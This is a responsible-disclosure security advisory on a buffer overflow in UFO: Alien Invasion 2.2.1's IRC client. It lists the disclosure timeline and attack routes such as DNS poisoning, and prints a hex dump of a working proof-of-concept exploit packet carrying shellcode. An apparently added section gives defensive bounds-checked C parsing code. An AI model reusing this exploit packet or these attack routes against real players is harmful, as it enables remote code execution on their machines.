Remote Arbitrary Code Execution Vulnerability in UFO: Alien Invasion
--------------------------------------------------------------------

June 18th, 2010

=======
Summary
=======
Name: Remote Arbitrary Code Execution Vulnerability in UFO: Alien Invasion
Release Date: June 18th, 2010
Discoverer: Jason Geffner
Version Affected: UFO: Alien Invasion 2.2.1
                  (versions prior to UFO: Alien Invasion 2.2.1 not tested)
Risk: Very High
Status: Published

============
Introduction
============
This paper discusses how an unprivileged remote attacker can execute arbitrary
code on networked players' computers. This vulnerability was responsibly
disclosed to the UFO: Alien Invasion project leader, and this advisory was not
released until a stable fixed build of the game had been released.

==========
Background
==========
"UFO: Alien Invasion is an open source strategy video game in which the player
fights aliens that are trying to take control of the Earth. The game is heavily
influenced by the X-COM series (mostly by UFO: Enemy Unknown). It is based on a
modified id Tech 2 engine, and runs on Linux, Microsoft Windows, and Mac OS X
for both PPC and Intel Macs. UFO:AI has been nominated for 'Best project for
Gamers' in the Sourceforge 2007 and 2008 Community Choice Awards and was
positively noted by Linux Journal." [1]

========
Timeline
========
04/29/08 UFO: Alien Invasion 2.2.1 released
10/28/09 Remote arbitrary code execution vulnerability discovered in UFO: Alien
         Invasion 2.2.1
10/31/09 Detailed vulnerability report responsibly disclosed to the UFO: Alien
         Invasion project leader
11/02/09 Fix checked into source code trunk
06/18/10 Stable build of UFO: Alien Invasion 2.3 released, fixing vulnerability
06/18/10 Advisory released

=============
Vulnerability
=============
The IRC client component of UFO: Alien Invasion 2.2.1 contains multiple
security vulnerabilities that allow a malicious IRC server to remotely execute
arbitrary code on the client's system. There are numerous ways that an attacker
could cause a player to connect to a malicious server, for example:

- Perform a man-in-the-middle attack to inject IRC server responses into the
  TCP stream.
- Use DNS poisoning to redirect the player's client from the real
  irc.freenode.org server to the attacker's malicious server.
- Use the in-game "rcon" functionality against a server to remotely issue the
  command "irc_connect " (passwords for rcon can be
  brute-forced and/or sniffed over the network since they're sent in
  plaintext).
- Use social engineering to convince a player to press ~ and type
  "irc_connect ".

There are numerous buffer overflow vulnerabilities that can be exploited in the
IRC client component. The following vulnerability can be exploited in a single
packet:

The Irc_Proto_ParseServerMsg(...) function parses server messages of up to 1024
bytes in length and writes the parsed fields into an irc_server_msg_t
structure. This structure's last field is a 512-byte string buffer. A malformed
server response can therefore cause Irc_Proto_ParseServerMsg(...) to write past
the end of the irc_server_msg_t structure and overwrite the return address for
Irc_Logic_ReadMessages(...).

=======
Exploit
=======
See below for a proof-of-concept exploit packet for UFO: Alien Invasion 2.2.1
for Windows. The payload will launch "mspaint.exe" and terminate the UFO: Alien
Invasion process.

00000000:  30 30 31 20 3a 41 41 41 41 41 41 41 41 41 41 41    001 :AAAAAAAAAAA
00000010:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000020:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000030:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000040:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000050:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000060:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000070:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000080:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000090:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
000000a0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
000000b0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
000000c0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
000000d0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
000000e0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
000000f0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000100:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000110:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000120:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000130:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000140:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000150:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000160:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000170:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000180:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000190:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
000001a0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
000001b0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
000001c0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
000001d0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
000001e0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
000001f0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000200:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000210:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000220:  41 41 41 41 41 41 41 41 41 41 41 41 41 28 50 d2    AAAAAAAAAAAAA(P.
00000230:  0a 2b c9 83 e9 cd e8 ff ff ff ff c0 5e 81 76 0e    .+..........^.v.
00000240:  76 83 85 b6 83 ee fc e2 f4 8a 6b 0c b6 76 83 e5    v.........k..v..
00000250:  3f 93 b2 57 d2 fd d1 b5 3d 24 8f 0e e4 62 08 f7    ?..W....=$...b..
00000260:  9e 79 34 cf 90 47 7c b4 76 da bf e4 ca 74 af a5    .y4..G|.v....t..
00000270:  77 b9 8e 84 71 94 73 d7 e1 fd d1 95 3d 34 bf 84    w...q.s.....=4..
00000280:  66 fd c3 fd 33 b6 f7 cf b7 a6 d3 0e fe 6e 08 dd    f...3........n..
00000290:  96 77 50 66 8a 3f 08 b1 3d 77 55 b4 49 47 43 29    .wPf.?..=wU.IGC)
000002a0:  77 b9 8e 84 71 4e 63 f0 42 75 fe 7d 8d 0b a7 f0    w...qNc.Bu.}....
000002b0:  54 2e 08 dd 92 77 50 e3 3d 7a c8 0e ee 6a 82 56    T....wP.=z...j.V
000002c0:  3d 72 08 84 66 ff c7 a1 92 2d d8 e4 ef 2c d2 7a    =r..f....-...,.z
000002d0:  56 2e dc df 3d 64 68 03 eb 1c 82 08 33 cf 83 85    V...=dh.....3...
000002e0:  b6 26 eb b4 3d 19 04 7a 63 cd 73 30 14 20 eb 23    .&..=..zc.s0. .#
000002f0:  23 cb 1e 7a 63 4a 85 f9 bc f6 78 65 c3 73 38 c2    #..zcJ....xe.s8.
00000300:  a5 04 ec ef b6 25 7c 50 db 05 f3 e4 df 18 f7 ab    .....%|P........
00000310:  d3 0e e6 85 b6 0d 0a                               .......

==========
Conclusion
==========
Safe string handling functions should be used instead of their standard CRT
equivalents or inlined string copies.
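
As an added example (not code from this advisory or from the UFO: Alien
Invasion project), the C parser below applies the bounded-copy discipline the
conclusion calls for to the message shape described in the Vulnerability
section: a server line of at most 1024 bytes is split into the fields of a
fixed-size structure whose last member is a 512-byte buffer, and any field that
would not fit is rejected instead of being written past the end of the
structure. The structure and field names (irc_msg_t, prefix, command, params),
the helper names and the sample lines are assumptions constructed for this
example; they are not UFO:AI's definitions.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Bounds assumed from the advisory's description: messages up to 1024 bytes,
   parsed into a structure whose last field is a 512-byte string buffer. */
#define IRC_MSG_MAX   1024
#define IRC_FIELD_MAX 512

/* Hypothetical message structure; field names are this example's, not UFO:AI's. */
typedef struct {
    char prefix[64];
    char command[32];
    char params[IRC_FIELD_MAX];   /* last field: the one an overlong line would overrun */
} irc_msg_t;

/* Copy n bytes into dst and NUL-terminate, or fail if they do not fit.
   Failing closed here is what turns an oversized field into a dropped
   message rather than a write beyond the structure. */
static bool copy_bounded(char *dst, size_t dst_size, const char *src, size_t n)
{
    if (n >= dst_size)
        return false;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return true;
}

/* Parse "[:prefix] <command> [params...]" from a raw line of len bytes.
   Returns true on success; false if the line is malformed or any field
   would exceed its buffer. */
bool irc_parse_line(const char *line, size_t len, irc_msg_t *out)
{
    const char *p = line;
    const char *end;
    const char *sp;
    size_t n;

    memset(out, 0, sizeof *out);
    if (len == 0 || len > IRC_MSG_MAX)
        return false;
    end = line + len;
    while (end > p && (end[-1] == '\r' || end[-1] == '\n'))   /* strip CRLF */
        end--;

    if (p < end && *p == ':') {                                /* optional prefix */
        sp = memchr(p, ' ', (size_t)(end - p));
        if (sp == NULL)
            return false;
        if (!copy_bounded(out->prefix, sizeof out->prefix, p + 1, (size_t)(sp - p - 1)))
            return false;
        p = sp + 1;
    }

    sp = memchr(p, ' ', (size_t)(end - p));                    /* command */
    n = sp ? (size_t)(sp - p) : (size_t)(end - p);
    if (n == 0)
        return false;
    if (!copy_bounded(out->command, sizeof out->command, p, n))
        return false;
    p = sp ? sp + 1 : end;

    /* Everything else, including a trailing ":..." parameter, goes into the
       last field, and is rejected if it cannot fit with its terminator. */
    return copy_bounded(out->params, sizeof out->params, p, (size_t)(end - p));
}

/* Constructed benign welcome line: must parse with the expected fields. */
bool check_benign_line(void)
{
    static const char line[] = ":irc.example.test 001 player :Welcome to the network\r\n";
    irc_msg_t msg;
    if (!irc_parse_line(line, sizeof line - 1, &msg))
        return false;
    return strcmp(msg.prefix, "irc.example.test") == 0 &&
           strcmp(msg.command, "001") == 0 &&
           strcmp(msg.params, "player :Welcome to the network") == 0;
}

/* Constructed "001 :" line whose trailing parameter is 600 bytes: well under
   the 1024-byte message bound, but over the 512-byte field bound, so the
   parser must refuse it rather than truncate or overrun. */
bool check_overlong_params(void)
{
    char line[IRC_MSG_MAX];
    irc_msg_t msg;
    size_t n = 0;
    memcpy(line, "001 :", 5);
    n = 5;
    while (n < 5 + 600)
        line[n++] = 'A';
    line[n++] = '\r';
    line[n++] = '\n';
    return irc_parse_line(line, n, &msg) == false;
}

int main(void)
{
    printf("benign line parsed correctly: %s\n", check_benign_line() ? "yes" : "no");
    printf("overlong parameter rejected:  %s\n", check_overlong_params() ? "yes" : "no");
    return 0;
}
```

The second check is the point of the example: a message-level limit of 1024
bytes does nothing to protect a 512-byte field inside the structure, so each
copy has to be bounded by the size of its own destination. Replacing the copies
with strncpy(3) would not be enough on its own either, since it silently
truncates and leaves the buffer unterminated when the source is too long;
checking the length and rejecting the message is the safer behaviour for data
arriving from a remote server.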

===============
Fix Information
===============
This issue has now been resolved. UFO: Alien Invasion 2.3 can be downloaded
from http://ufoai.ninex.info/wiki/index.php/Download

==========
References
==========
[1] http://en.wikipedia.org/wiki/UFO:_Alien_Invasion

NGSSoftware Insight Security Research
http://www.ngssoftware.com/
http://www.databasesecurity.com/
http://www.nextgenss.com/
+44(0)208 401 0070